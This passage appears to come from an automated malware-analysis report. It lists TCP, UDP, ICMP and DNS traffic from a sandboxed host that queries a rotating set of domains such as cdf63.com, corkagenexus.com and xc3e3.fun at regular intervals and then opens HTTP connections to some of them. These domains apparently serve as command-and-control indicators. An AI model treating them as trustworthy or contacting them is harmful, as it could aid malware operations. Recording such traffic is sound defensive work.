Aug 23, 2023 14:56:13.017205000 CEST	80	49183	192.0.78.25	192.168.0.56
Aug 23, 2023 14:56:13.017237902 CEST	80	49184	192.0.78.25	192.168.0.56
Aug 23, 2023 14:56:13.017258883 CEST	80	49183	192.0.78.25	192.168.0.56
Aug 23, 2023 14:56:13.017307043 CEST	80	49183	192.0.78.25	192.168.0.56
Aug 23, 2023 14:56:13.017549038 CEST	49184	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:56:13.017651081 CEST	49184	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:56:13.017652035 CEST	49183	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:56:13.025971889 CEST	80	49184	192.0.78.25	192.168.0.56
Aug 23, 2023 14:56:13.026005030 CEST	80	49184	192.0.78.25	192.168.0.56
Aug 23, 2023 14:56:13.026024103 CEST	80	49184	192.0.78.25	192.168.0.56
Aug 23, 2023 14:56:13.026333094 CEST	49184	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:56:13.026333094 CEST	49184	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:56:13.026384115 CEST	49184	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:56:13.034810066 CEST	80	49184	192.0.78.25	192.168.0.56
Aug 23, 2023 14:56:23.031713963 CEST	49185	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:56:23.040504932 CEST	80	49185	188.114.96.3	192.168.0.56
Aug 23, 2023 14:56:23.040803909 CEST	49185	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:56:23.041021109 CEST	49185	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:56:23.041102886 CEST	49185	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:56:23.041111946 CEST	49186	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:56:23.049531937 CEST	80	49185	188.114.96.3	192.168.0.56
Aug 23, 2023 14:56:23.049566984 CEST	80	49186	188.114.96.3	192.168.0.56
Aug 23, 2023 14:56:23.049812078 CEST	49186	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:56:23.049901009 CEST	49186	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:56:23.050405025 CEST	80	49185	188.114.96.3	192.168.0.56
Aug 23, 2023 14:56:23.050703049 CEST	49185	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:56:23.058559895 CEST	80	49186	188.114.96.3	192.168.0.56
Aug 23, 2023 14:56:23.074120045 CEST	80	49186	188.114.96.3	192.168.0.56
Aug 23, 2023 14:56:23.074151993 CEST	80	49186	188.114.96.3	192.168.0.56
Aug 23, 2023 14:56:23.074172020 CEST	80	49186	188.114.96.3	192.168.0.56
Aug 23, 2023 14:56:23.074189901 CEST	80	49186	188.114.96.3	192.168.0.56
Aug 23, 2023 14:56:23.074208021 CEST	80	49186	188.114.96.3	192.168.0.56
Aug 23, 2023 14:56:23.074224949 CEST	80	49186	188.114.96.3	192.168.0.56
Aug 23, 2023 14:56:23.074246883 CEST	80	49186	188.114.96.3	192.168.0.56
Aug 23, 2023 14:56:23.074486971 CEST	49186	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:56:23.074599981 CEST	49186	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:56:23.074599981 CEST	49186	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:56:23.074600935 CEST	49186	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:56:23.083220005 CEST	80	49186	188.114.96.3	192.168.0.56
Aug 23, 2023 14:56:23.083436012 CEST	49186	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:56:33.080065012 CEST	49187	80	192.168.0.56	146.148.179.231
Aug 23, 2023 14:56:33.230680943 CEST	80	49187	146.148.179.231	192.168.0.56
Aug 23, 2023 14:56:33.231019020 CEST	49187	80	192.168.0.56	146.148.179.231
Aug 23, 2023 14:56:33.231287956 CEST	49187	80	192.168.0.56	146.148.179.231
Aug 23, 2023 14:56:33.231365919 CEST	49187	80	192.168.0.56	146.148.179.231
Aug 23, 2023 14:56:33.231507063 CEST	49188	80	192.168.0.56	146.148.179.231
Aug 23, 2023 14:56:33.381762028 CEST	80	49187	146.148.179.231	192.168.0.56
Aug 23, 2023 14:56:33.382560015 CEST	80	49188	146.148.179.231	192.168.0.56
Aug 23, 2023 14:56:33.382785082 CEST	49188	80	192.168.0.56	146.148.179.231
Aug 23, 2023 14:56:33.382880926 CEST	49188	80	192.168.0.56	146.148.179.231
Aug 23, 2023 14:56:33.383083105 CEST	80	49187	146.148.179.231	192.168.0.56
Aug 23, 2023 14:56:33.383392096 CEST	49187	80	192.168.0.56	146.148.179.231
Aug 23, 2023 14:56:33.534357071 CEST	80	49188	146.148.179.231	192.168.0.56
Aug 23, 2023 14:56:33.534390926 CEST	80	49188	146.148.179.231	192.168.0.56
Aug 23, 2023 14:56:33.534612894 CEST	49188	80	192.168.0.56	146.148.179.231
Aug 23, 2023 14:56:33.534706116 CEST	49188	80	192.168.0.56	146.148.179.231
Aug 23, 2023 14:56:33.685797930 CEST	80	49188	146.148.179.231	192.168.0.56
Aug 23, 2023 14:57:11.001099110 CEST	49189	80	192.168.0.56	104.21.71.149
Aug 23, 2023 14:57:11.009797096 CEST	80	49189	104.21.71.149	192.168.0.56
Aug 23, 2023 14:57:11.010046959 CEST	49189	80	192.168.0.56	104.21.71.149
Aug 23, 2023 14:57:11.010340929 CEST	49189	80	192.168.0.56	104.21.71.149
Aug 23, 2023 14:57:11.010426998 CEST	49189	80	192.168.0.56	104.21.71.149
Aug 23, 2023 14:57:11.010476112 CEST	49190	80	192.168.0.56	104.21.71.149
Aug 23, 2023 14:57:11.018825054 CEST	80	49189	104.21.71.149	192.168.0.56
Aug 23, 2023 14:57:11.018968105 CEST	80	49190	104.21.71.149	192.168.0.56
Aug 23, 2023 14:57:11.019181967 CEST	49190	80	192.168.0.56	104.21.71.149
Aug 23, 2023 14:57:11.019298077 CEST	49190	80	192.168.0.56	104.21.71.149
Aug 23, 2023 14:57:11.019570112 CEST	80	49189	104.21.71.149	192.168.0.56
Aug 23, 2023 14:57:11.019812107 CEST	49189	80	192.168.0.56	104.21.71.149
Aug 23, 2023 14:57:11.027879953 CEST	80	49190	104.21.71.149	192.168.0.56
Aug 23, 2023 14:57:11.428344011 CEST	80	49190	104.21.71.149	192.168.0.56
Aug 23, 2023 14:57:11.428376913 CEST	80	49190	104.21.71.149	192.168.0.56
Aug 23, 2023 14:57:11.428396940 CEST	80	49190	104.21.71.149	192.168.0.56
Aug 23, 2023 14:57:11.428792953 CEST	49190	80	192.168.0.56	104.21.71.149
Aug 23, 2023 14:57:11.428792953 CEST	49190	80	192.168.0.56	104.21.71.149
Aug 23, 2023 14:57:11.428842068 CEST	49190	80	192.168.0.56	104.21.71.149
Aug 23, 2023 14:57:11.437603951 CEST	80	49190	104.21.71.149	192.168.0.56

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2023 14:52:03.685162067 CEST	53	65100	4.2.2.1	192.168.0.56
Aug 23, 2023 14:52:03.745917082 CEST	53144	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:52:03.760540962 CEST	53	53144	4.2.2.1	192.168.0.56
Aug 23, 2023 14:52:06.931653976 CEST	53	63561	4.2.2.1	192.168.0.56
Aug 23, 2023 14:52:20.278709888 CEST	55180	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:52:20.313422918 CEST	53	55180	4.2.2.1	192.168.0.56
Aug 23, 2023 14:52:31.490850925 CEST	54298	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:52:32.525567055 CEST	54298	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:52:34.627928019 CEST	57483	53	192.168.0.56	4.2.2.2
Aug 23, 2023 14:52:35.034435987 CEST	53	57483	4.2.2.2	192.168.0.56
Aug 23, 2023 14:52:45.764513969 CEST	60999	53	192.168.0.56	4.2.2.2
Aug 23, 2023 14:52:46.780911922 CEST	60999	53	192.168.0.56	4.2.2.2
Aug 23, 2023 14:52:48.789952993 CEST	63416	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:52:49.208004951 CEST	53	63416	4.2.2.1	192.168.0.56
Aug 23, 2023 14:52:49.208492994 CEST	60999	53	192.168.0.56	4.2.2.2
Aug 23, 2023 14:52:49.825397968 CEST	53	60999	4.2.2.2	192.168.0.56
Aug 23, 2023 14:52:58.337176085 CEST	138	138	192.168.0.56	192.168.0.255
Aug 23, 2023 14:52:58.337222099 CEST	137	137	192.168.0.56	192.168.0.255
Aug 23, 2023 14:52:59.832931995 CEST	59878	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:52:59.868642092 CEST	53	59878	4.2.2.1	192.168.0.56
Aug 23, 2023 14:53:10.036329031 CEST	54348	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:53:10.065687895 CEST	53	54348	4.2.2.1	192.168.0.56
Aug 23, 2023 14:53:20.105818987 CEST	55189	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:53:20.392556906 CEST	53	55189	4.2.2.1	192.168.0.56
Aug 23, 2023 14:53:31.105423927 CEST	54583	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:53:32.155360937 CEST	54583	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:53:34.217483997 CEST	53340	53	192.168.0.56	4.2.2.2
Aug 23, 2023 14:53:35.260850906 CEST	53340	53	192.168.0.56	4.2.2.2
Aug 23, 2023 14:53:37.304344893 CEST	54583	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:53:41.500859022 CEST	54583	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:53:46.190397024 CEST	53	54583	4.2.2.1	192.168.0.56
Aug 23, 2023 14:53:46.190428972 CEST	53	54583	4.2.2.1	192.168.0.56
Aug 23, 2023 14:53:46.190447092 CEST	53	54583	4.2.2.1	192.168.0.56
Aug 23, 2023 14:53:46.190463066 CEST	53	54583	4.2.2.1	192.168.0.56
Aug 23, 2023 14:53:46.191035986 CEST	53340	53	192.168.0.56	4.2.2.2
Aug 23, 2023 14:53:46.205610991 CEST	53	53340	4.2.2.2	192.168.0.56
Aug 23, 2023 14:53:47.775043964 CEST	53	53340	4.2.2.2	192.168.0.56
Aug 23, 2023 14:53:47.775068998 CEST	53	53340	4.2.2.2	192.168.0.56
Aug 23, 2023 14:53:56.213375092 CEST	58832	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:53:57.227004051 CEST	58832	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:53:59.299689054 CEST	58331	53	192.168.0.56	4.2.2.2
Aug 23, 2023 14:53:59.322243929 CEST	53	58331	4.2.2.2	192.168.0.56
Aug 23, 2023 14:54:09.750034094 CEST	60296	53	192.168.0.56	4.2.2.2
Aug 23, 2023 14:54:09.773257971 CEST	53	60296	4.2.2.2	192.168.0.56
Aug 23, 2023 14:54:19.848519087 CEST	59872	53	192.168.0.56	4.2.2.2
Aug 23, 2023 14:54:20.896209002 CEST	59872	53	192.168.0.56	4.2.2.2
Aug 23, 2023 14:54:20.924452066 CEST	53	59872	4.2.2.2	192.168.0.56
Aug 23, 2023 14:54:30.933418989 CEST	50457	53	192.168.0.56	4.2.2.2
Aug 23, 2023 14:54:30.971318007 CEST	53	50457	4.2.2.2	192.168.0.56
Aug 23, 2023 14:54:41.148457050 CEST	55184	53	192.168.0.56	4.2.2.2
Aug 23, 2023 14:54:42.194250107 CEST	55184	53	192.168.0.56	4.2.2.2
Aug 23, 2023 14:54:44.293405056 CEST	64276	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:54:44.426460981 CEST	53	64276	4.2.2.1	192.168.0.56
Aug 23, 2023 14:54:54.435375929 CEST	49861	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:54:55.461503029 CEST	49861	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:54:55.512598991 CEST	53	49861	4.2.2.1	192.168.0.56
Aug 23, 2023 14:55:05.673952103 CEST	57563	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:55:06.724095106 CEST	57563	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:55:06.759984970 CEST	53	57563	4.2.2.1	192.168.0.56
Aug 23, 2023 14:55:14.863790989 CEST	137	137	192.168.0.56	192.168.0.255
Aug 23, 2023 14:55:16.812181950 CEST	61127	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:55:16.839780092 CEST	53	61127	4.2.2.1	192.168.0.56
Aug 23, 2023 14:55:26.896548033 CEST	61466	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:55:26.932342052 CEST	53	61466	4.2.2.1	192.168.0.56
Aug 23, 2023 14:55:59.286957026 CEST	64207	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:56:00.334163904 CEST	64207	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:56:02.353132963 CEST	57571	53	192.168.0.56	4.2.2.2
Aug 23, 2023 14:56:02.631433010 CEST	137	137	192.168.0.56	192.168.0.255
Aug 23, 2023 14:56:02.978498936 CEST	53	57571	4.2.2.2	192.168.0.56
Aug 23, 2023 14:56:02.979015112 CEST	64207	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:56:02.993818998 CEST	53	64207	4.2.2.1	192.168.0.56
Aug 23, 2023 14:56:43.541297913 CEST	61605	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:56:44.587605953 CEST	61605	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:56:46.687865973 CEST	49746	53	192.168.0.56	4.2.2.2
Aug 23, 2023 14:56:47.697745085 CEST	49746	53	192.168.0.56	4.2.2.2
Aug 23, 2023 14:56:49.745368004 CEST	61605	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:56:53.940962076 CEST	61605	53	192.168.0.56	4.2.2.1
Aug 23, 2023 14:57:00.666049957 CEST	53	61605	4.2.2.1	192.168.0.56
Aug 23, 2023 14:57:00.666084051 CEST	53	61605	4.2.2.1	192.168.0.56
Aug 23, 2023 14:57:00.666100979 CEST	53	61605	4.2.2.1	192.168.0.56
Aug 23, 2023 14:57:00.666117907 CEST	53	61605	4.2.2.1	192.168.0.56
Aug 23, 2023 14:57:00.666867018 CEST	49746	53	192.168.0.56	4.2.2.2
Aug 23, 2023 14:57:00.995655060 CEST	53	49746	4.2.2.2	192.168.0.56
Aug 23, 2023 14:57:00.995688915 CEST	53	49746	4.2.2.2	192.168.0.56
Aug 23, 2023 14:57:00.995706081 CEST	53	49746	4.2.2.2	192.168.0.56

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Aug 23, 2023 14:53:47.775506973 CEST	192.168.0.56	4.2.2.2	2c44	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 23, 2023 14:52:03.745917082 CEST	192.168.0.56	4.2.2.1	0x47bc	Standard query (0)	fp2e7a.wpc.phicdn.net	65	IN (0x0001)	false
Aug 23, 2023 14:52:20.278709888 CEST	192.168.0.56	4.2.2.1	0xc0ae	Standard query (0)	www.growind.info	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:52:31.490850925 CEST	192.168.0.56	4.2.2.1	0xbf08	Standard query (0)	www.qq9122.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:52:32.525567055 CEST	192.168.0.56	4.2.2.1	0xbf08	Standard query (0)	www.qq9122.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:52:34.627928019 CEST	192.168.0.56	4.2.2.2	0xbf08	Standard query (0)	www.qq9122.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:52:45.764513969 CEST	192.168.0.56	4.2.2.2	0xc0af	Standard query (0)	www.corkagenexus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:52:46.780911922 CEST	192.168.0.56	4.2.2.2	0xc0af	Standard query (0)	www.corkagenexus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:52:48.789952993 CEST	192.168.0.56	4.2.2.1	0xc0af	Standard query (0)	www.corkagenexus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:52:49.208492994 CEST	192.168.0.56	4.2.2.2	0xc0af	Standard query (0)	www.corkagenexus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:52:59.832931995 CEST	192.168.0.56	4.2.2.1	0xad29	Standard query (0)	www.dalilamendezgallery.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:10.036329031 CEST	192.168.0.56	4.2.2.1	0x590d	Standard query (0)	www.spv88.online	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:20.105818987 CEST	192.168.0.56	4.2.2.1	0x9270	Standard query (0)	www.kuailesms.net	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:31.105423927 CEST	192.168.0.56	4.2.2.1	0x74e5	Standard query (0)	www.cdf63.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:32.155360937 CEST	192.168.0.56	4.2.2.1	0x74e5	Standard query (0)	www.cdf63.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:34.217483997 CEST	192.168.0.56	4.2.2.2	0x74e5	Standard query (0)	www.cdf63.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:35.260850906 CEST	192.168.0.56	4.2.2.2	0x74e5	Standard query (0)	www.cdf63.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:37.304344893 CEST	192.168.0.56	4.2.2.1	0x74e5	Standard query (0)	www.cdf63.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:41.500859022 CEST	192.168.0.56	4.2.2.1	0x74e5	Standard query (0)	www.cdf63.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:46.191035986 CEST	192.168.0.56	4.2.2.2	0x74e5	Standard query (0)	www.cdf63.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:56.213375092 CEST	192.168.0.56	4.2.2.1	0x8068	Standard query (0)	www.xc3e3.fun	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:57.227004051 CEST	192.168.0.56	4.2.2.1	0x8068	Standard query (0)	www.xc3e3.fun	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:59.299689054 CEST	192.168.0.56	4.2.2.2	0x8068	Standard query (0)	www.xc3e3.fun	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:54:09.750034094 CEST	192.168.0.56	4.2.2.2	0x4a1e	Standard query (0)	www.mixova.art	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:54:19.848519087 CEST	192.168.0.56	4.2.2.2	0xec51	Standard query (0)	www.familia-gava.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:54:20.896209002 CEST	192.168.0.56	4.2.2.2	0xec51	Standard query (0)	www.familia-gava.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:54:30.933418989 CEST	192.168.0.56	4.2.2.2	0x8b10	Standard query (0)	www.skindocworld.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:54:41.148457050 CEST	192.168.0.56	4.2.2.2	0x863e	Standard query (0)	www.activ-ketodietakjsy620.cloud	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:54:42.194250107 CEST	192.168.0.56	4.2.2.2	0x863e	Standard query (0)	www.activ-ketodietakjsy620.cloud	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:54:44.293405056 CEST	192.168.0.56	4.2.2.1	0x863e	Standard query (0)	www.activ-ketodietakjsy620.cloud	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:54:54.435375929 CEST	192.168.0.56	4.2.2.1	0xb1d0	Standard query (0)	www.greaterudition.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:54:55.461503029 CEST	192.168.0.56	4.2.2.1	0xb1d0	Standard query (0)	www.greaterudition.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:55:05.673952103 CEST	192.168.0.56	4.2.2.1	0xcb47	Standard query (0)	www.brioche-amsterdam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:55:06.724095106 CEST	192.168.0.56	4.2.2.1	0xcb47	Standard query (0)	www.brioche-amsterdam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:55:16.812181950 CEST	192.168.0.56	4.2.2.1	0x908f	Standard query (0)	www.gms-medika.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:55:26.896548033 CEST	192.168.0.56	4.2.2.1	0x39ff	Standard query (0)	www.sportbettingapps.app	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:55:59.286957026 CEST	192.168.0.56	4.2.2.1	0xbb5d	Standard query (0)	www.corkagenexus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:56:00.334163904 CEST	192.168.0.56	4.2.2.1	0xbb5d	Standard query (0)	www.corkagenexus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:56:02.353132963 CEST	192.168.0.56	4.2.2.2	0xbb5d	Standard query (0)	www.corkagenexus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:56:02.979015112 CEST	192.168.0.56	4.2.2.1	0xbb5d	Standard query (0)	www.corkagenexus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:56:43.541297913 CEST	192.168.0.56	4.2.2.1	0x736f	Standard query (0)	www.cdf63.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:56:44.587605953 CEST	192.168.0.56	4.2.2.1	0x736f	Standard query (0)	www.cdf63.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:56:46.687865973 CEST	192.168.0.56	4.2.2.2	0x736f	Standard query (0)	www.cdf63.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:56:47.697745085 CEST	192.168.0.56	4.2.2.2	0x736f	Standard query (0)	www.cdf63.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:56:49.745368004 CEST	192.168.0.56	4.2.2.1	0x736f	Standard query (0)	www.cdf63.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:56:53.940962076 CEST	192.168.0.56	4.2.2.1	0x736f	Standard query (0)	www.cdf63.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:57:00.666867018 CEST	192.168.0.56	4.2.2.2	0x736f	Standard query (0)	www.cdf63.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 23, 2023 14:52:03.745225906 CEST	4.2.2.1	192.168.0.56	0x146e	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2023 14:52:03.745254993 CEST	4.2.2.1	192.168.0.56	0xa504	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2023 14:52:03.745254993 CEST	4.2.2.1	192.168.0.56	0xa504	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:52:20.313422918 CEST	4.2.2.1	192.168.0.56	0xc0ae	No error (0)	www.growind.info		66.29.151.121	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:52:35.034435987 CEST	4.2.2.2	192.168.0.56	0xbf08	No error (0)	www.qq9122.com	50907ed7.u.fn01.vip		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2023 14:52:35.034435987 CEST	4.2.2.2	192.168.0.56	0xbf08	No error (0)	50907ed7.u.fn01.vip	74858af1f.n.fnvip100.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2023 14:52:35.034435987 CEST	4.2.2.2	192.168.0.56	0xbf08	No error (0)	74858af1f.n.fnvip100.com		137.220.225.54	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:52:35.034435987 CEST	4.2.2.2	192.168.0.56	0xbf08	No error (0)	74858af1f.n.fnvip100.com		137.220.225.17	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:52:49.208004951 CEST	4.2.2.1	192.168.0.56	0xc0af	Server failure (2)	www.corkagenexus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:52:49.825397968 CEST	4.2.2.2	192.168.0.56	0xc0af	Server failure (2)	www.corkagenexus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:52:59.868642092 CEST	4.2.2.1	192.168.0.56	0xad29	No error (0)	www.dalilamendezgallery.com	dalilamendezgallery.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2023 14:52:59.868642092 CEST	4.2.2.1	192.168.0.56	0xad29	No error (0)	dalilamendezgallery.com		192.0.78.25	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:52:59.868642092 CEST	4.2.2.1	192.168.0.56	0xad29	No error (0)	dalilamendezgallery.com		192.0.78.24	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:10.065687895 CEST	4.2.2.1	192.168.0.56	0x590d	No error (0)	www.spv88.online		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:10.065687895 CEST	4.2.2.1	192.168.0.56	0x590d	No error (0)	www.spv88.online		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:20.392556906 CEST	4.2.2.1	192.168.0.56	0x9270	No error (0)	www.kuailesms.net		146.148.179.231	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:46.190397024 CEST	4.2.2.1	192.168.0.56	0x74e5	Server failure (2)	www.cdf63.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:46.190428972 CEST	4.2.2.1	192.168.0.56	0x74e5	Server failure (2)	www.cdf63.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:46.190447092 CEST	4.2.2.1	192.168.0.56	0x74e5	Server failure (2)	www.cdf63.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:46.190463066 CEST	4.2.2.1	192.168.0.56	0x74e5	Server failure (2)	www.cdf63.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:46.205610991 CEST	4.2.2.2	192.168.0.56	0x74e5	Server failure (2)	www.cdf63.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:47.775043964 CEST	4.2.2.2	192.168.0.56	0x74e5	Server failure (2)	www.cdf63.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:47.775068998 CEST	4.2.2.2	192.168.0.56	0x74e5	Server failure (2)	www.cdf63.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:59.322243929 CEST	4.2.2.2	192.168.0.56	0x8068	No error (0)	www.xc3e3.fun		104.21.71.149	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:53:59.322243929 CEST	4.2.2.2	192.168.0.56	0x8068	No error (0)	www.xc3e3.fun		172.67.170.181	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:54:09.773257971 CEST	4.2.2.2	192.168.0.56	0x4a1e	No error (0)	www.mixova.art	mixova.art		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2023 14:54:09.773257971 CEST	4.2.2.2	192.168.0.56	0x4a1e	No error (0)	mixova.art		185.215.4.57	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:54:20.924452066 CEST	4.2.2.2	192.168.0.56	0xec51	Name error (3)	www.familia-gava.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:54:30.971318007 CEST	4.2.2.2	192.168.0.56	0x8b10	No error (0)	www.skindocworld.com	skindocworld.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2023 14:54:30.971318007 CEST	4.2.2.2	192.168.0.56	0x8b10	No error (0)	skindocworld.com		192.0.78.25	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:54:30.971318007 CEST	4.2.2.2	192.168.0.56	0x8b10	No error (0)	skindocworld.com		192.0.78.24	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:54:44.426460981 CEST	4.2.2.1	192.168.0.56	0x863e	Name error (3)	www.activ-ketodietakjsy620.cloud	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:54:55.512598991 CEST	4.2.2.1	192.168.0.56	0xb1d0	No error (0)	www.greaterudition.com	greaterudition.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2023 14:54:55.512598991 CEST	4.2.2.1	192.168.0.56	0xb1d0	No error (0)	greaterudition.com		34.102.136.180	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:55:06.759984970 CEST	4.2.2.1	192.168.0.56	0xcb47	No error (0)	www.brioche-amsterdam.com		104.21.26.182	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:55:06.759984970 CEST	4.2.2.1	192.168.0.56	0xcb47	No error (0)	www.brioche-amsterdam.com		172.67.138.86	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:55:16.839780092 CEST	4.2.2.1	192.168.0.56	0x908f	No error (0)	www.gms-medika.com		172.67.200.50	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:55:16.839780092 CEST	4.2.2.1	192.168.0.56	0x908f	No error (0)	www.gms-medika.com		104.21.60.186	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:55:26.932342052 CEST	4.2.2.1	192.168.0.56	0x39ff	Name error (3)	www.sportbettingapps.app	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:56:02.978498936 CEST	4.2.2.2	192.168.0.56	0xbb5d	Server failure (2)	www.corkagenexus.com	none	none	A (IP address)	IN (0x0001)	false
